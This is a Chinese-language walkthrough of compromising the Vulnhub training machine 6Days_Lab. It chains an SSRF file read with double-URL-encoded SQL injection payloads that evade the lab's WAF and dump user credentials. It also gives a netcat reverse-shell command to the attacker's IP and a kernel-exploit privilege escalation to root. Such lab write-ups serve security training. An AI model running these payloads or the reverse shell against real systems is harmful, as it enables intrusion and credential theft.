本文详细记录了利用信息收集、SSRF漏洞和SQL注入技术,逐步攻破Vulnhub靶场6Days_Lab-v1.0.1的过程。通过Nmap扫描端口,发现开放的22、80、8080端口,并利用IPS界面的SQL注入,获取了数据库信息和用户账号。接着,通过SSRF漏洞读取网站源码,利用目录扫描工具Dirb,最终获取了管理员账号和密码,成功登录并提升权限,找到并执行了flag文件。
vulnhub靶场,6Days_Lab-v1.0.1
环境准备
靶机下载地址:https://www.vulnhub.com/entry/6days-lab-11,156/#flags
目标:获取根目录下的flag
下载好靶机后,使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
信息收集
1、获取靶机IP地址
kali攻击机输入netdiscover,不添加任何参数,会默认扫描机器网卡上的ip值的所有网段,获取到的靶机IP地址为192.168.58.143
2、查看靶机端口开启情况
kali攻击机输入nmap -v -Pn 192.168.58.143
-v:显示详细信息
-Pn:不使用ping扫描
如图所示,对方开启了22、80、8080端口
3、进入web网站查看
浏览器访问192.168.58.143的80端口
发现是一个ips(入侵防御系统)的界面,根据他的提示输入折扣码试试
显示代码已过期,在折扣码后面加入一个单引号看看是否存在SQL注入
意思为恶意请求被WAF阻挡。所以我们需要去找其他的方法去突破
查看页面源代码,发现image.php页面会进行引用图片
访问这个页面试试
这里感觉可能存在ssrf,将src后面改为index.php发现并没有拦截也没有报错,说明是存在ssrf漏洞的
4、使用dirb进行网站目录结果扫描
漏洞利用
1、通过前面信息收集的过程发现网站存在ssrf漏洞,但是页面并没有显示出来网站主页的源码,使用burpsuite抓包试试看
这里是成功回显出了网站主页的源码
2、查看passwd文件信息,得到靶机有账户user,andrea
3、查看config.php文件,得到数据库账号、密码、数据库名信息
4、查看其他文件发现均会被ips(入侵防御系统)拦截
5、查看apache默认配置信息
发现在apache默认文件中,发现网站实际就是在8080端口,只接受本地连接,然后转发到80端口,通过配置信息获得的消息,可以发现网站直接跟mysql数据库连接,存在SQL注入,两次url编码即可绕过
6、利用python,将注入的SQL语句经过两次url编码即可,使用ssrf加SQL注入拿到登入密码
7、查看为数字型还是字符型
from urllib.parse import quote
print(quote(quote("aa'")))
结果:aa%2527
显示促销码无效
from urllib.parse import quote
print(quote(quote("aa'#")))
结果:aa%2527%2523
发现能成功闭合,说明为字符型注入,闭合方式为’#
8、查看字段数
from urllib.parse import quote
print(quote(quote("aa' order by 2#")))
结果:aa%2527%2520order%2520by%25202%2523
from urllib.parse import quote
print(quote(quote("aa' order by 3#")))
结果:aa%2527%2520order%2520by%25203%2523
字段数为2的时候返回正常,字段数为3的时候返回促销码无效。所以判断字段数为2
9、查看回显位置
from urllib.parse import quote
print(quote(quote("aa' union select 1,2#")))
结果:aa%2527%2520union%2520select%25201%252C2%2523
所以判断1的位置是有回显的
10、查看当前库
from urllib.parse import quote
print(quote(quote("aa' union select database(),2#")))
结果:aa%2527%2520union%2520select%2520database%2528%2529%252C2%2523
所以当前库为fancydb
11、查看fancydb库下的所有表
from urllib.parse import quote
print(quote(quote("aa' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2#")))
结果:aa%2527%2520union%2520select%2520%2528select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%252C2%2523
12、查看users表下的所有字段
from urllib.parse import quote
print(quote(quote("aa' union select (select group_concat(column_name) from information_schema.columns where table_name='users'),2#")))
结果:aa%2527%2520union%2520select%2520%2528select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_name%253D%2527users%2527%2529%252C2%2523
13、查看username和password字段的值
from urllib.parse import quote
print(quote(quote("aa' union select (select group_concat(concat_ws('~',username,password)) from users),2#")))
结果:aa%2527%2520union%2520select%2520%2528select%2520group_concat%2528concat_ws%2528%2527~%2527%252Cusername%252Cpassword%2529%2529%2520from%2520users%2529%252C2%2523
14、成功得到账号密码,由前面信息收集可知靶机开启了22端口,使用ssh连接输入账号密码成功连接
但是发现输入一些命令并没有回显
15、可能是回显信息丢失,尝试反弹shell
攻击机重新打开一个终端,输入nc -lvvp 1111,监听本地端口
然后在靶机上执行nc -e /bin/bash 192.168.58.130 1111
可以看到监听的这边成功连接了
使用python反弹一个原始命令行
python -c 'import pty;pty.spawn("/bin/bash")'
权限提升
1、查看当前权限,发现只是一个普通的权限
2、查看当前系统内核,发现系统内核版本为3.13.0
3、使用kali搜索3.13.0版本可用的exp
4、开启kali的apache服务,将攻击脚本放到网站的根目录下面
5、在反弹的shell中下载攻击脚本
6、使用攻击脚本进行提权
因为攻击脚本是用c语言编写的,所以需要使用gcc对攻击脚本进行编译
输入./exp开启攻击,成功提升为root权限
7、提权成功后,切换到系统根目录,发现flag文件,发现为可执行脚本,./flag执行,得到flag
扫一扫
435
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
